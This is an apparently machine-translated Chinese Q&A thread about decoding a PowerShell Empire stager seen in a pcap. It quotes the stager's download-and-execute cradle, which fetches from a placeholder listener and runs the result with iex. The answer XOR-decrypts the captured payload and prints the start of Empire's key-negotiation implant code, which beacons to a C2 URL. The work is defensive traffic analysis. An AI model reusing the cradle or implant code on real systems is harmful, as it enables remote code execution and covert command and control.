我正在开展一个项目,我想要做两件事:来自stager的powershell命令,以及一个通信的pcap,并解码命令和控制流。
这与https://github.com/PowerShellEmpire/Empire
有关Base64 decode powershell命令如下所示:
'$wc=new-object system.net.webclient;$u=\'USERAGENT\';$wc.headers.add(\'user-agent\',$u);$wc.proxy = [system.net.webrequest]::defaultwebproxy;$wc.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;$k=\'SECRETKEYi=0;char[]]$b=([char[]]($wc.downloadstring("http://IPOFLISTENER/index.asp")))|%{$_-bxor$k[$i++%$k.length]};iex ($b-join\'\')'
https://github.com/PowerShellEmpire/Empire/wiki/Staging
wiki说的是stager,它来自有效载荷&index; index.asp'使用登台密钥进行XOR加密。因为我有stager和key,我怎样才能恢复明文呢?
这是我到目前为止所做的:
tshark -nr~ / Desktop / stager.pcap -Y" ip.id == 0x7ba9" -T字段-e data
384d17284214657e6e6030470e177709092a460c16506125281022510b57460c0d145d187d710e650f0e464a130f786e0d296d750b684525734d0270197f234a124159184f2e7e55231d37433f36280e181412193b7518140a302603475b3d5b3b553b076f7d79691d67016b5220351509560d1d2d435a321203374a05543e5a1b5e1c39533349556e0e44042f0a3622221945211c5e5b343a0e364648014a4d43632a1265094f5d6067017e284d1f292f224d111176687a692110602373550c3f7d2a7678185d1d01712e433f177a14153e5d3d121f66251015116a3e63406b0c61093f791a78513e5b3d083d0629041e34590c10627032050920463a48217e375c3c190d7963666e0e447d1e3a2e22114d197671030075731c63642f4e437a3f761d247b7d075321460a725c526c7c682c6c0b717c5a24365d616028794c135e1c380e65736155370e404352243f330e145d3d2c191113184978034e7b2b7b50712f6b0b7d0e79180840452f337a7a6c234c2f727e772a3603370339633d5c3b755718733e7f6227471d083f11033738224e2a1e415d197d2330733a5b3c49137d0d0e440e11142d6034083a0f3b003f4d14787b7266307d260f620d494e053c772b6b6d0e53433a5609082f0639321e247d217172673903340c64185b3e6027163a38460d787f387a00630e2536060b1e7462656466251e21006b23542b633b412a3f592f4f0b6a413706414314023b40661a3574761473331a503e5f03062d5d3a1e64147e696070365f0c1715201e2c7910261f67131223315a1a4e017b3b6a2f0275187a4221452d6239317a6a0d3f4e0d32545b341f2910774a085e1c46145d28650d11141c5859020e107413233564140c4567091d076b072c5b227b1b11426f44601b1e6002525a3a2c28022d2e617510735f05301438640f4e437a1f561d247b7d075d2f4b44144a1e61630529147078707703172505642271226530682b1862087c67166a3e174e506e727a5a1161786a11120e406e6925530008591f50701234480d6a764a613917383e38287a707b435e6968442641571e277e551c380e657369622b523063392d3935353d7d172d191c6e0732024d195c015a137e30055731687c01700f0e582a386b7c410d313d1f79253d07174b4301276e56151724427d0e472d1a1f020b206709291a04173d7b50030740107a194e2b4550761c1f180a6f520d7f0d63323761631b0e07080d7e4d39735d637839431d5c1b555705732904670b5136432d163f1418301362187461130a331746076d2b4a2e6a16134f75030b6a6427082c11353f15436a2a3a55502e0729024f391a5308256b00386238671e007630083f113f0309035d311e5d76213028267e50002a6d38590c07621e58750a760a723502161477100d2f3c1f7d253204265119142f4c1a105b1e4538581d0f54014808417663192c00637b46566e1b0522470f481d063f5c1d63141e455f255a0104504109021f3e60171178717d7729070143014a5a1f4f446f413e04653e5f0b4718273b332d450d2b74135c2e37053b0d00491e0a521a29046509081c6a56060f47471e0271494c761854411327120a6d2d124a7a2d161d2e552f73601a1b40743d1476632a2c650b1a181c7b7725334c2952530c1a5d227b1873136d6e1e0e49352d7d607749623d060c1104363b721344144a6c3b16352e583a7e581313494c330a14676b4a127c1e74667d1d25140e2578046d1d6c59184f2e5e75031d37631f36280e3834071b2d4865143c2731621a5217063f5d0a0844245a64216001740a2a19221c3f662e3675503268440a754a074e731c412d0e6b7d1a1e600151135c1f7a000939040a1e7f512f1e406e60256f005c5e094f70121c6f63607e0b42195e78040e2e0b637f157405004e084613074a4d507f1c3f74245e553d1b404d191a737c6c
这是对十六进制中index.asp的响应的有效负载。
登台密钥为: ~8yK6] * 0N3d& | cZGLm)X_15 @ S`C#j:n(
特别是,我需要理解这一部分:
|%{$_-bxor$k[$i++%$k.length]};iex ($b-join\'\')'
我知道$ _是通过管道传入的值,bxor使用密钥$ k对其进行xoring。我不确定其余的是什么。
答案 0 :(得分:0)
您需要将两个字符串转换为通用格式。让我们从密钥开始。
假设 ~8yK6] * 0N3d& | cZGLm)X_15 @S`C#j:n(只是ASCII编码的关键字,我们可以将其转换回字节数组,如下所示:
# convert key string to [byte[]]
$keyString = '~8yK6]*0N3d&|cZGLm)X_15@S`C#j:n('
$key = [System.Text.Encoding]::ASCII.GetBytes($keyString)
来自tshark的加密有效负载似乎是十六进制编码的。幸运的是,十六进制字符串转换相当简单,因为每对字符代表一个byte
:
# get ready to convert the encrypted stager payload from hex to [byte[]]
$payloadHex = "384d17284214657e6e6030470e177709092a460c16506125281022510b57460c0d145d187d710e650f0e464a130f786e0d296d750b684525734d0270197f234a124159184f2e7e55231d37433f36280e181412193b7518140a302603475b3d5b3b553b076f7d79691d67016b5220351509560d1d2d435a321203374a05543e5a1b5e1c39533349556e0e44042f0a3622221945211c5e5b343a0e364648014a4d43632a1265094f5d6067017e284d1f292f224d111176687a692110602373550c3f7d2a7678185d1d01712e433f177a14153e5d3d121f66251015116a3e63406b0c61093f791a78513e5b3d083d0629041e34590c10627032050920463a48217e375c3c190d7963666e0e447d1e3a2e22114d197671030075731c63642f4e437a3f761d247b7d075321460a725c526c7c682c6c0b717c5a24365d616028794c135e1c380e65736155370e404352243f330e145d3d2c191113184978034e7b2b7b50712f6b0b7d0e79180840452f337a7a6c234c2f727e772a3603370339633d5c3b755718733e7f6227471d083f11033738224e2a1e415d197d2330733a5b3c49137d0d0e440e11142d6034083a0f3b003f4d14787b7266307d260f620d494e053c772b6b6d0e53433a5609082f0639321e247d217172673903340c64185b3e6027163a38460d787f387a00630e2536060b1e7462656466251e21006b23542b633b412a3f592f4f0b6a413706414314023b40661a3574761473331a503e5f03062d5d3a1e64147e696070365f0c1715201e2c7910261f67131223315a1a4e017b3b6a2f0275187a4221452d6239317a6a0d3f4e0d32545b341f2910774a085e1c46145d28650d11141c5859020e107413233564140c4567091d076b072c5b227b1b11426f44601b1e6002525a3a2c28022d2e617510735f05301438640f4e437a1f561d247b7d075d2f4b44144a1e61630529147078707703172505642271226530682b1862087c67166a3e174e506e727a5a1161786a11120e406e6925530008591f50701234480d6a764a613917383e38287a707b435e6968442641571e277e551c380e657369622b523063392d3935353d7d172d191c6e0732024d195c015a137e30055731687c01700f0e582a386b7c410d313d1f79253d07174b4301276e56151724427d0e472d1a1f020b206709291a04173d7b50030740107a194e2b4550761c1f180a6f520d7f0d63323761631b0e07080d7e4d39735d637839431d5c1b555705732904670b5136432d163f1418301362187461130a331746076d2b4a2e6a16134f75030b6a6427082c11353f15436a2a3a55502e0729024f391a5308256b00386238671e007630083f113f0309035d311e5d76213028267e50002a6d38590c07621e58750a760a723502161477100d2f3c1f7d253204265119142f4c1a105b1e4538581d0f54014808417663192c00637b46566e1b0522470f481d063f5c1d63141e455f255a0104504109021f3e60171178717d7729070143014a5a1f4f446f413e04653e5f0b4718273b332d450d2b74135c2e37053b0d00491e0a521a29046509081c6a56060f47471e0271494c761854411327120a6d2d124a7a2d161d2e552f73601a1b40743d1476632a2c650b1a181c7b7725334c2952530c1a5d227b1873136d6e1e0e49352d7d607749623d060c1104363b721344144a6c3b16352e583a7e581313494c330a14676b4a127c1e74667d1d25140e2578046d1d6c59184f2e5e75031d37631f36280e3834071b2d4865143c2731621a5217063f5d0a0844245a64216001740a2a19221c3f662e3675503268440a754a074e731c412d0e6b7d1a1e600151135c1f7a000939040a1e7f512f1e406e60256f005c5e094f70121c6f63607e0b42195e78040e2e0b637f157405004e084613074a4d507f1c3f74245e553d1b404d191a737c6c"
$payloadHexCount = $payloadHex.Length
# create new [byte[]] for actual payload
$payload = ,0 * ($payloadHexCount / 2)
for($i=0; $i -lt $payloadHexCount; $i+=2)
{
# convert each char pair to bytes
$payload[$i / 2] = [System.Convert]::ToByte($payloadHex.Substring($i, 2), 16)
}
然后最后我们只需要对两者进行异或:
# XOR the two byte arrays and concatenate the resulting bytes as char's
$decryptedString = ""
for ($i = 0; $i -lt $payload.Count; $i++){
$decryptedString += [char]($payload[$i] -bxor $key[$i % $key.Length])
}
多田!有效负载解密:
PS C:\> $decryptedString
FunctION STart-NEGoTIaTe{param($s,$SK,$UA="lol")ADD-TYpe -ASsEMbly SysTem.SeCUrITy;AdD-TYPe -aSsEmBLY SYSTeM.CoRE;$ErrorActionPreference = "SilentlyContinue";$e=[SYSTem.TeXT.EncOdING]::ASCII;$AES=NEw-OBJeCt SYSteM.SeCuRITY.CrYptOGRaphY.AesCRYpTOSErVicePrOVIdER;$IV = [bYte] 0..255 | GEt-RANdoM -counT 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($SK); $AES.IV = $IV;$cSP = New-OBject SYStEM.SEcURity.CrYptOgrAphY.CsPPaRamEtErS;$cSP.FlaGs = $CSp.FLAgs -BOR [System.SecuRITy.CRyPTOGraPHY.CspPROvIdErFlAGs]::USeMACHInEKEyStore;$rS = NEw-OBjECT SYsTem.SeCURITY.CRyptOgRAPHy.RSACryptoSERVICEProvIDER -ARgUmentLIST 2048,$cSP;$Rk=$rs.ToXMLStRINg($FaLSe);$r=1..16|FOrEaCH-OBjEct{Get-RandoM -max 26};$ID=('ABCDEFGHKLMNPRSTUVWXYZ123456789'[$R] -JOin '');$ib=$E.GEtbytES($rk);$eb=$IV+$AES.CReaTEENcryPTOr().TRAnsformFINalBLOCk($Ib,0,$ib.LengTh);IF(-not $wc){$wC=New-ObJeCT SYstEm.NeT.WEbCLiENT;$Wc.PROxy = [System.NEt.WEbReQueST]::GETSYSTemWEbPRoXy();$WC.ProxY.CredenTIAlS = [SysTeM.NET.CreDEntiAlCacHe]::DEFauLTCrEDEnTIaLS;}$wc.Headers.Add("User-Agent",$UA);$wc.Headers.Add("Cookie","SESSIONID=$ID");$raw=$wc.UploadData($s+"index.jsp","POST",$eb);$DE=$e.GetStrING($RS.decrYPT($RAw,$fALSE));$EpoCh=$de[0..9] -joIN'';$KeY=$De[10..$DE.LengTh] -jOiN '';$AES=NEW-OBjEcT SystEM.SEcUrItY.CryPToGrAphy.AesCrypToSeRvICePROviDer;$IV = [byTE] 0..255 | GET-RANdoM -COUnt 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($key);